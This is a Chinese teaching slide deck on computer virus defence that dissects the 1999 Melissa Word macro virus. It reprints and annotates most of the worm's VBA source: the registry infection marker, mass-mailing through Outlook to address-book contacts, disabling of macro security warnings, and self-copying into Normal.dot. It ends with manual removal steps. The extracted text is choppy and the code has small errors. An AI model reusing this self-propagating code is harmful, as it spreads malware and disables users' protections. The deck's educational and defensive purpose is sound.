《梅丽莎病毒剖析》PPT课件.ppt

1、计算机病毒与防治,重庆电子工程职业学院,计算机病毒与防治课程小组,教学单元3-3 宏病毒防治,梅丽莎病毒源码分析,梅丽莎病毒特点,梅丽莎病毒行为分析,第二讲 梅丽莎病毒剖析,计算机病毒与防治课程小组,梅丽莎病毒的手工清除,梅丽莎病毒特点,计算机病毒与防治课程小组,病毒名称：梅丽莎,又称 Macro.Word97.Melissa,病毒类型： 宏病毒,危险级别：,影响系统 Word97/Word2000,梅丽莎病毒简介,梅丽莎病毒特点,计算机病毒与防治课程小组,梅丽莎”病毒于1999年3月爆发，它伪装成一封来自朋友或同事的“重要信息”电子邮件。用户打开邮件后，病毒会让受感染的电脑向外发送50封携毒

2、邮件。尽管这种病毒不会删除电脑系统文件，但它引发的大量电子邮件会阻塞电子邮件服务器，使之瘫痪。 1999年4月1日，在美国在线的协助下，美国政府将史密斯捉拿归案,梅丽莎病毒简介,梅丽莎病毒特点,计算机病毒与防治课程小组,2002年5月7日美国联邦法院判决这个病毒的制造者入狱20个月和附加处罚，这是美国第一次对重要的电脑病毒制造者进行严厉惩罚。在联邦法庭上，控辩双方均认定“梅丽莎”病毒造成的损失超过8000万美元，编制这个病毒的史密斯承认，他从AOL盗取了一个帐户名，并利用这个帐户到处传播宏病毒，最后他表示认罪，认为设计电脑病毒是一个“巨大的错误”，自己的行为“不道德,病毒制造者,梅丽莎病毒特点

3、,计算机病毒与防治课程小组,该病毒通过电子邮件的方式传播, 当用户打开附件中的“list.doc”文件时，将立刻中招。 病毒的代码使用Word的VBA语言编写, 开创了此类病毒的先河, 如同病毒作者的猖狂之言“Its a new age!”。 病毒通过对注册表进行修改, 并调用Outlook发送含有病毒的邮件, 进行快速传播。由于该病毒发送的邮件的发件人是用户熟悉的, 因此往往被很多人忽视。同时, 该病毒会自动重复以上的动作, 由此引起连锁反应, 在短时间内, 造成邮件服务器的大量阻塞, 严重影响正常网络通讯。 该病毒可感染Word97、Word2000的Doc文件, 并修改通用模板Norma

4、l.dot, 使受害者几乎永无“ 脱离苦海”之时,梅丽莎病毒特点,梅丽莎病毒源码分析,计算机病毒与防治课程小组,梅丽莎病毒巧妙地利用了VBA技术对注册表、Word模板和邮件系统进行了猛烈地攻击,1、梅丽莎病毒被激活后, 将修改注册表中的“HKEY_CURRENT_USERSoftwareMicrosoftoffice”键, 并增加项“Melissa？”, 赋值为“ by Kwyjibo”(病毒作者的大名)，并将此作为是否已感染病毒的标志。 病毒中相关操作的核心代码如下所示： 读取注册表项的内容, 进行判断 If System.PrivateProfileString(“”,“HKEY_CURR

5、ENT_USERSoftwareMicrosoftoffice”，“Melissa？”)“ by Kwyjibo” Then 其它操作代码 设置感染标志 System.PrivateProfileString(“HKEY_CURRENT_USERSoftwareMicrosoftoffice”，“Melissa？”)= “ by Kwyjibo” End If,梅丽莎病毒源码分析,计算机病毒与防治课程小组,2、发送邮件 在Outlook程序启动的情况下, 梅丽莎病毒将自动给地址簿中的成员(前50名)发送邮件, 主题为“Important Message From ”, 用户名“”为Word软件

6、的用户名, 邮件的正文为“Here is that document you asked for dont show anyone else; 一)”, 邮件的附件为一个文件名为“list.doc”的带毒文件。 为了实现七述功能, 病毒利用获取了地址薄中所有的邮件地址, 并发送内嵌病毒代码的邮件, 达到了疯狂传播的目的。 病毒中相关操作的核心代码如下所示,梅丽莎病毒源码分析,计算机病毒与防治课程小组,Dim UngaDasOutlook,DasMapiName,BreakUmoffASlice 创建Outlook应用程序实例对象 Set UngaDasOutlook=CreateObject(

7、“Outlook.Application”) 获取MAPI对象 Set DasMapiName= UngaDasOutlook.GetNameSpace(“MAPI”) If UngaDasOutlook=”Outlook” Then DasMapiName.Logon “profile”,”password” 遍历地址薄, 进行邮件发送操作 For y=1 To DasMapiName.AddressLists.Count Set AddyBook= DasMapiName.AddressLists(y) X=1 Set BreakUmoffASlice= UngaDasOutlook.Cr

8、eateItem(0) For oo=1 To AddyBook.AddressEntries.Count 获取第n个收件人地址 Peep=AddyBook.AddressEntries(x) 加入收件人地址 BreakUmoffASlice.Recipients.Add Peep X=x+1,梅丽莎病毒源码分析,计算机病毒与防治课程小组,If x50 Then oo= AddyBook.AddressEntries.Count Next oo 设置邮件的主题 BreakUmoffASlice.Subject=”Important Message From ” & Application.Us

9、erName 设置邮件的正文 BreakUmoffASlice.Body=”Here is that document you asked for dont show anyone else :-)” 加入邮件的附件 BreakUmoffASlice.Attachments.Add ActiveDocument.FullName 发送邮件 BreakUmoffASlice.Send Next y 断开连接 DasMapiName.Logoff Peep=” End If,梅丽莎病毒源码分析,计算机病毒与防治课程小组,3、修改Word模版 梅丽莎病毒激活后, 将感染Word97和Word2000

10、的文档并修改通用模板Normal.dot,使感染后的Word运行时“宏”菜单项不能使用,并且导致Word软件对文件转换、打开带有宏的文件、Normal.dot遭到修改后都不会出现警告, 使病毒的魔爪“ 天衣无缝”。最后, 将病毒自身的代码和所做的设置修改,利用一个很高超的方法一同写入Normal.dot之中, 使用户以后打开Word时病毒反复发作。 病毒中相关操作的核心代码如下所示,梅丽莎病毒源码分析,计算机病毒与防治课程小组,使“ 宏” 工具栏的“ 安全” 项无效 CommandBars(“Macro”).Controls(“Security”).Enabled=False 使“工具”菜单栏

11、的“宏”项无效 CommandBars(“Tools”).Controls(“Macro”).Enabled=False 将“0”(1-1)值赋于ConfirmConversions属性,使“文件转换”对话框不显示 Options.ConfirmConversions=(1-1) 将,“0”（1-1）值赋于VirusProtection属性, 使“宏警告”对话框不显示 Options.VirusProtection=(1-1) 将“0”(1-1)值赋于SaveNormalPrompt属性,使Normal.dot被修改后不显示警告对话框 Options.SaveNormalPrompt=(1-1

12、) 获取当前文档的VBA工程的第1个模块名称 Set ADI1=ActiveDocument.VBProject.VBComponents.Item(1) 获取Normal.dot的VBA工程的第1个模块名称 Set NTI1=NormalTemplate.VBProject.VBComponents.Item(1) NTCL=NTI1.CodeModule.CountOfLines ADCL=ADI1.CodeModule.CountOfLines BGN=2,梅丽莎病毒源码分析,计算机病毒与防治课程小组,如果当前文档未感染 If ADI1.Name”Melissa” Then 修改VBA工

13、程的第1个模块名称为“Melissa” If ADCL0 Then ADI1.CodeModule.DeleteLines 1,ADCL Set ToInfect=ADI1 ADI1.Name=“Melissa“ DoAD=True End If 如果Normal.dot未感染 If NTI1.Name “Melissa” Then 修改VBA工程的第1个模块名称为“Melissa“ If NTCL0 Then NTI1.CodeModule.DeleteLines 1,NTCL Set ToInfect=NTI1 NTI1.Name=”Melissa” DoNT=True End If,梅丽

14、莎病毒源码分析,计算机病毒与防治课程小组,如果都已感染, 跳转执行以后的命令 If DoNT True And DoAD True Then GoTo CY 开始感染Normal.dot If DoNT=True Then Do While ADI1.CodeModule.Lines(1,1)=” ADI1.CodeModule.DeleteLines 1 Loop ToInfect.CodeModule.AddFromString(“Private Sub Document_Close（）”) Do While ADI1.CodeModule.Lines(BGN,1) “” ToInfect

15、.CodeModule.InsertLines BGN,ADI1.CodeModule.Lines(BGN,1) BGN=BGN+1 Loop End If,梅丽莎病毒源码分析,计算机病毒与防治课程小组,If DoAD=True Then 开始感染当前文档 Do While NTI1.CodeModule.Lines(1,1)=” NTI1.CodeModule.DeleteLines 1 Loop ToInfect.CodeModule.AddFromString(“Private Sub Document.Open()”) Do While NTI1.CodeModule.Lines(BG

16、N,1)” ToInfect.CodeModule.InsertLines BGN,NTI1.CodeModule.Lines(BGN,1) BGN=BGN+1 Loop End If CYA: 保存被修改的当前文档和Normal.dot If NTCL0 And ADCL=0 And (InStr(1,ActiveDocument.Name,”Document”)=False) Then ActiveDocument.SaveAs FileName=ActiveDocument.FullName ElseIf (InStr(1,ActiveDocument.Name,”Document”)F

17、alse) Then ActiveDocument.Saved=True End If Enf If,梅丽莎病毒主要行为分析,计算机病毒与防治课程小组,梅丽莎病毒源码,梅丽莎病毒对注册表的修改,梅丽莎病毒发出的邮件,梅丽莎病毒手工清除,计算机病毒与防治课程小组,感染了梅丽莎病毒后，同样可以用最新的防治计算机病毒的软件来查杀，如果手头上一时没有病毒防治软件的话，对感染宏病毒的WORD文件也可以通过手工操作的方法来处理,1）在Administrator用户下，打开我的电脑, 选择“工具文件夹选项查看”, 选中“显示系统文件夹的内容”和“显示所有文件和文件夹”选项, 取消“隐藏受保护的操作系统文件”选项, 确定后搜索NORMAL.DOT 文件。注意在搜索时要将“更多高级选项”下的“搜索系统文件夹”和“搜索隐藏的文件和文件夹”都勾上, 待搜索完毕后, 将找到的NORMAL.DOT文件全部删除, 并清空回收站,2）打开注册表编辑器，搜索所有键名称为“Melissa”的项，全部删除